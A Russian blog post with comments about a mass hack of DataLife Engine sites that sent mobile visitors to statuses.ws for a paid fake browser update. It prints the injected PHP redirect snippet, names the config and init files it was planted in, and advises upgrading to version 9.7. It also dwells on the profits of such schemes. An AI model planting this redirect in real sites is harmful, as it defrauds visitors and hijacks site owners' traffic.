Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе

Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе
Массовый взлом DLE сайтов или сколько можно заработать на мобильном редиректе

Всем привет!  В предыдущей статье было рассказано, что такое мобильный редирект и как он организовывается. Вам скорее всего интересно узнать, сколько может принести подобный взлом. Тут все индивидуально и зависит от масштабов, скажем человек скупающий шеллы на античате может вполне получать 10-15 к/дейли, что касается ситуации с массовым взломом, то тут речь идет уже о других цифрах.

В начале января огромное количество DLE пользователей забило тревогу. На их сайтах появился хитрый мобильный редирект, организованный через домен statuses.ws. ИМХО целсофту вместо того, чтобы рассылать претензии следует хорошо поработать над защитой движка, так как в данном случае взлом имел массовый характер и ломали с большой долей вероятности автоматизированным скриптом.

Основные симптомы заражения — при попытке зайти с мобильного устройства на сайт качался файл, предлагающий обновить браузер, то, что обновление НЕ БЕСПЛАТНОЕ, думаю, вы догадались и сами.

Сам редирект содержал следующий код —
$iphone = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPhone»);
$android = strpos($_SERVER[‘HTTP_USER_AGENT’],»Android»);
$palmpre = strpos($_SERVER[‘HTTP_USER_AGENT’],»webOS»);
$berry = strpos($_SERVER[‘HTTP_USER_AGENT’],»BlackBerry»);
$ipod = strpos($_SERVER[‘HTTP_USER_AGENT’],»iPod»);

if ($iphone || $android || $palmpre || $ipod || $berry === true) {
header(‘Location: http://statuses.ws/’);
}

Причем на многих сайтах он был вставлен до 10 раз, что явно свидетельствует об автоматизации процесса. Как видно для конкретной OC были приготовлены «свои ништяки». Данный код был замечен чаще всего в файлах:
/engine/data/config.php
/engine/data/dbconfig.php
/engine/init.php

Также замечено появление новых пользователей с правами админа. Вставки попадались и в этих файлах:
engine/init.php
index.php

Грешить на хостера, неправильные права на папки и тд. уже не приходилось, речь шла о дырке в движке. Решение проблемы — обновиться до последней на данный момент версии 9.7 и пропатчить ее с оф. сайта.

Ну а теперь вкусности. Сколько же можно заработать таким образом? В интернете валяется полно скриншотов, скажем вот этот( за его правдоподобность не отвечаю, но судя по масштабам сумма вполне реальная):

Заработок на мобильной редиректе
Заработок на мобильной редиректе

Комментарии не требуются. От себя добавлю, что взлом сайтов — уголовно наказуемое занятие и отдел «К» при желании может дотянуться и до владельца сайта statuses.ws и до хостинга, но пока это не произошло. Также всем у кого есть сайты на DLE версии ниже 9.7 настоятельно рекомендую проверить эти файлы у себя на сервере.
Всем хорошего дня!

Понравилась статья? Поделиться с друзьями:
Комментарии: 24
  1. Ильмир

    Плохо, меня тоже взломали но уже устранил проблему

  2. WCA

    А я только увидел у себя такую бяку… Спасибо… Ушел проверять остальные проекты!

  3. andrey

    Мой сайт сломали еще 30 декабря, такой себе подарочек перед НГ

    Еще хотел добавить вирус прячут еще в скриптах сжатия Gzip, если он у вас включен. То-есть не в самых скриптах, а в тех которые сжимают min

  4. Роман

    У меня так беда тоже была, на одном из моих киносайтов, там нечего сложного покопаться в коде и все, а вообще толковую версию dle нужно ставить (а при скачке зануленых версий она идет сразу же с вирусами)

  5. X-maks

    зашибись, только купил уже ломают…

Добавить комментарий

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!: